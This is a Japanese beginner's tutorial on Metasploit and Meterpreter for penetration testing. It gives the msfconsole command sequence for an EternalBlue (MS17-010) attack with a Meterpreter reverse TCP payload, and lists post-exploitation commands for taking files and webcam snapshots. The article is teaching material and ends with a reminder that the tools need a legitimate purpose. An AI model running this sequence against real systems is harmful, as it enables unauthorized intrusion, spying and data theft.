🔩

MetasploitとMeterpreter入門 - Cyber Security Roadmap

2024/11/26に公開

Metasploit

はじめに

有名なペネトレーションのツールとして「Metasploit」というツールがあります。これはペネトレーションテストにおける包括的なフレームワークで、攻撃の準備から実行、そして結果の収集までを効率的に行うための機能を提供するものです。

そして、Metasploitとセットで登場するものに「Meterpreter」というものがあります、これはMetasploitの中で使用されるポストエクスプロイトペイロード(システム侵入(エクスプロイト)後に実行される攻撃モジュール)です。攻撃が成功した後、ターゲットシステムを操作するための機能を提供します。

今回の記事では、以下の内容をとりあげてMetasploitとMeterpreterの基礎を学んでいきます。

  • Metasploitとは?
  • Metasploitの使い方
  • エクスプロイトとペイロード
  • Meterpreterとは?
  • Meterpreterの使い方
  • 実際にどのように活用するのか?

1. Metasploitとは?

Metasploitは、ペネトレーションテスト(侵入テスト)で使用されるオープンソースのフレームワークです。特に脆弱性を利用した攻撃の再現やセキュリティ評価に特化しています。

特徴

  • モジュール化された構造:
    脆弱性エクスプロイト(システム侵入)やペイロード(攻撃コード)がモジュールとして管理されています。
  • 多彩な攻撃方法:
    クライアントサイドの攻撃、ネットワーク攻撃、Webアプリケーションの攻撃など、幅広い脆弱性をターゲットにできます。
  • 柔軟性:
    カスタムモジュールを作成したり、既存のモジュールをカスタマイズすることで、特定のシナリオに適応可能です。

2. Metasploitの基本的な使い方

Metasploitの使い方を簡単に説明します。

① Metasploitを起動

msfconsole

Metasploitのインターフェースが立ち上がります。ここからすべての操作を行います。

② ターゲットのスキャン

脆弱性を探すためのスキャンを行います。以下はNmapを使った例です:

db_nmap -sV <ターゲットIP>

結果を確認して、どのサービスやポートが利用可能かを確認します。

③ エクスプロイトを選択

脆弱性に応じたエクスプロイトモジュールを選びます。以下は
SMB(Server Message Block)に関する脆弱性に応じた例です:

use exploit/windows/smb/ms17_010_eternalblue

④ オプションを設定

ターゲットIPやポート、ペイロード(攻撃コード)を設定します。

set RHOSTS <ターゲットIP>
set PAYLOAD windows/meterpreter/reverse_tcp

⑤ エクスプロイトを実行

設定を確認後、エクスプロイトを実行します。

exploit

3. エクスプロイトとペイロード

Metasploitの核心となるのがエクスプロイトペイロードです。

エクスプロイト

エクスプロイトとは、脆弱性を利用してターゲットシステムにアクセスするための手段です。Metasploitには数千ものエクスプロイトが用意されています。

:

  • SMBプロトコルの脆弱性(EternalBlue)
  • 古いバージョンのApacheやMySQLの脆弱性

ペイロード

ペイロードは、エクスプロイト成功後に実行されるコードのことです。例えば、以下のような種類があります:

  • リバースシェル: 攻撃者の端末にターゲットシステムのシェルを返す。
  • バインドシェル: ターゲットシステム上にシェルを開き、接続可能にする。
  • Meterpreter: 強力なポストエクスプロイトツール。

4. Meterpreterとは?

Meterpreterは、Metasploitが提供するポストエクスプロイトフレームワークです。エクスプロイトに成功した後に利用されるペイロードのツールで、攻撃者がターゲットシステムを制御しやすくするための機能が詰まっています。

特徴

  • システム操作の便利ツール:
    ファイル操作、スクリーンキャプチャ、キーロギングなどが可能です。
  • メモリ上で動作:
    これによりディスク上にファイルを残さず、検出を回避しやすい設計になっています。
  • 多彩な機能:
    内部ネットワークのスキャン、他のシステムへの侵入などが可能です。

基本的なMeterpreterコマンド

  • sysinfo: ターゲットのシステム情報を表示する
  • ls: 現在のディレクトリのファイル一覧を表示する
  • download <ファイル名>: ファイルをダウンロードする
  • upload <ファイル名>: ファイルをアップロードする
  • webcam_snap: ターゲットのWebカメラを利用して写真を撮影する

5. MetasploitとMeterpreterの活用事例

MetasploitとMeterpreterはどのように実践で使われるのでしょうか?以下の例で見てみましょう。

例: Windowsシステムへの侵入

  1. 脆弱性スキャン:
    Nmapでターゲットのサービスをスキャン(nmapコマンド、もしくはMetasploitでdb_nmapコマンド)し、脆弱性を探します。
  2. エクスプロイトの選択:
    SMBの脆弱性(MS17-010)を利用するモジュールを選択。
  3. ペイロードの設定:
    MeterpreterリバースTCPを使用(攻撃者がターゲットに接続できるようにする)。
  4. 攻撃成功後:
    Meterpreterを使って目的のファイルを取得する。

まとめ

MetasploitとMeterpreterは、ペネトレーションテストにおける非常に強力なツールです。その操作性や多機能性は、攻撃手法を学ぶうえでの絶好の教材になります。ただし、このようなツールは正当な理由がない限り使用を禁止されています。学習やテストの範囲内で適切に使用する必要があります。

Discussion